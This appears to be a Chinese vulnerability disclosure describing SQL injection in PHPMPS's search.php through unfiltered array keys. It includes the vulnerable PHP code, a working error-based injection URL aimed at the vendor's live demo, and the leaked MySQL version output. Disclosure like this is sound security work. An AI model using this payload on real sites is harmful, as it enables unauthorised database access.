### 简要描述: 不过滤 会出事 ### 详细说明: 首先全局过滤文件 addslashes_deep和sql_replace全部是针对数组的value的 所以 key呢。。。 ``` if(!get_magic_quotes_gpc()) { if (!empty($_GET))$_GET = addslashes_deep($_GET); if (!empty($_POST))$_POST = addslashes_deep($_POST); $_COOKIE = addslashes_deep($_COOKIE); $_REQUEST = addslashes_deep($_REQUEST); } if (!empty($_REQUEST))$_REQUEST = sql_replace($_REQUEST); if (!empty($_POST))$_POST = sql_replace($_POST); if (!empty($_GET))$_GET = sql_replace($_GET); unset($_REQUEST['table']); ``` 由于key被忽视 所以在/search.php 下 ``` if(!empty($_REQUEST['custom'])) { $sql = "SELECT infoid, COUNT(*) AS num FROM {$table}cus_value WHERE 0 "; foreach($_REQUEST['custom'] AS $key => $val) { if(!empty($val)) { $cus_num++; $sql .= " or (1 "; if(is_array($val)) { $cus_tom = get_custom_info($key); $sql .= " AND cusid = '$key'"; ``` get_custom_info($key) 在function get_custom_info($cusid='')里面 ``` $sql = "select * from {$table}custom where cusid='$cusid' "; $res = $db->query($sql); ``` 直接查询了 导致注入 ### 漏洞证明: 官网测试:...
### 简要描述: 不过滤 会出事 ### 详细说明: 首先全局过滤文件 addslashes_deep和sql_replace全部是针对数组的value的 所以 key呢。。。 ``` if(!get_magic_quotes_gpc()) { if (!empty($_GET))$_GET = addslashes_deep($_GET); if (!empty($_POST))$_POST = addslashes_deep($_POST); $_COOKIE = addslashes_deep($_COOKIE); $_REQUEST = addslashes_deep($_REQUEST); } if (!empty($_REQUEST))$_REQUEST = sql_replace($_REQUEST); if (!empty($_POST))$_POST = sql_replace($_POST); if (!empty($_GET))$_GET = sql_replace($_GET); unset($_REQUEST['table']); ``` 由于key被忽视 所以在/search.php 下 ``` if(!empty($_REQUEST['custom'])) { $sql = "SELECT infoid, COUNT(*) AS num FROM {$table}cus_value WHERE 0 "; foreach($_REQUEST['custom'] AS $key => $val) { if(!empty($val)) { $cus_num++; $sql .= " or (1 "; if(is_array($val)) { $cus_tom = get_custom_info($key); $sql .= " AND cusid = '$key'"; ``` get_custom_info($key) 在function get_custom_info($cusid='')里面 ``` $sql = "select * from {$table}custom where cusid='$cusid' "; $res = $db->query($sql); ``` 直接查询了 导致注入 ### 漏洞证明: 官网测试: http://www.phpmps.com/demo/search.php?custom[xss%27)%20AND%20(SELECT%208734%20FROM(SELECT%20COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23]=1 返回信息,成功获取版本信息: ``` MySQL server error report:Array ( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT infoid, COUNT(*) AS num FROM demo_cus_value WHERE 0 or (1 AND cusid = 'xss') AND (SELECT 8734 FROM(SELECT COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)#' AND cusvalue like '%1%' ) GROUP BY infoid HAVING num = '1' ) [2] => Array ( [error] => Duplicate entry '5.0.96-community-nt1' for key 1 ) [3] => Array ( [errno] => 1062 ) ) ``` 没各种限制 直接注入 [<img src="https://images.seebug.org/upload/201408/03182949556c8d174d46e2cff602097b092aa13f.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/03182949556c8d174d46e2cff602097b092aa13f.png) 没有过滤 [<img src="https://images.seebug.org/upload/201408/0318302038b754cc903be16ac792fd27373087cd.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/0318302038b754cc903be16ac792fd27373087cd.png)
